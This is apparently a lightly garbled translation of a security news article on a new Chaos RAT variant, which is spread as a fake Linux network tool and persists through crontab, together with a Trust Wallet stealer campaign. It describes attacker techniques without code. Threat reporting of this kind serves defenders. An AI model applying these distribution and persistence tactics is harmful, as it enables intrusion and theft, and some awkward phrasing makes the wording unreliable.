Threat hunters are turning their attention to a new variant of a remote access trojan (RAT) called Chaos RAT and which has been used in recent attacks targeting Windows and Linux systems.
According to findings from Acronis, the malware may have been distributed by tricking victims into downloading a network troubleshooting tool for Linux environments.
“Chaos RAT is an open-source RAT program written in Golang, offering cross-platform support for both Windows and Linux systems,” says security researchers Santiago Pontiroli, Gabor Molnar, and Kirill Antonenko in a report shared with The Hacker News.
“Inspired by popular frameworks like Cobalt Strike and Sliver, Chaos RAT provides an administrative panel where users can build payloads, establish sessions, and control compromised machines.”
Although work on the “remote administration tool” began back in 2017, it didn’t attract attention until December 2022 , when it was used in a malicious campaign targeting public web applications running on Linux systems with the XMRig cryptocurrency miner.
Once installed, the malware connects to an external server and waits for commands that allow it to launch reverse shells, upload/download/delete files, list files and directories, take screenshots, collect system information, lock/reboot/shutdown the machine, and open arbitrary URLs. The latest version of Chaos RAT is 5.0.3, which was released on May 31, 2024.
Acronis said that Linux variants of the malware have since been discovered in the wild, often in conjunction with cryptocurrency mining campaigns. Attack chains observed by the company show that the Chaos RAT is being distributed to victims via phishing emails containing malicious links or attachments.
These artifacts are designed to drop a malicious script that can modify the task scheduler “/etc/crontab” to periodically download malware as a way to set up persistence.
“Early campaigns used this technique to deliver cryptocurrency miners and the Chaos RAT separately, indicating that Chaos was primarily used for reconnaissance and information gathering on compromised devices,” he said. the researchers.
An analysis of a recently loaded sample uploaded to VirusTotal in January 2025 from India with the name “NetworkAnalyzer.tar.gz” has raised the possibility that users are being tricked into downloading malware by pretending to be a network troubleshooting tool for Linux environments.
Additionally, the admin panel that allows users to build payloads and manage infected machines has been found to be vulnerable to a command injection vulnerability ( CVE-2024-30850 , CVSS score: 8.8) which can be combined with a cross-site scripting flaw ( CVE-2024-31839 , CVSS score: 4.8) for to execute arbitrary code on the server with elevated privileges. Both vulnerabilities have since been patched by Chaos RAT developers as of May 2024.
Although it is currently not clear who is behind the use of Chaos RAT in real-world attacks, the development once again illustrates how threat actors continue to weaponize open source tools to their advantage and confuse attribution efforts.
“What starts as a developer tools can quickly become a threat actor’s first choice,” the researchers said. Using publicly available malware helps APT groups blend into the noise of everyday cybercrime. Open source malware offers a ‘good enough’ toolkit that can be quickly adapted and deployed. When multiple actors use the same open source malware, it becomes unclear what is meant.”
The revelation coincides with the emergence of a new campaign targeting Trust Wallet users on computers with counterfeit versions distributed via deceptive download links, phishing emails, or bundled software. The goal is to collect browser data, extract data from desktop wallets and browser extensions, execute commands, and act as a malware .
“Once installed, the malware can scan for wallet files, capture data from the clipboard, or monitor browser sessions to capture passphrases or private keys,” says Point Wild researcher Kedar S Pandit in a report published this week.
Swedish
English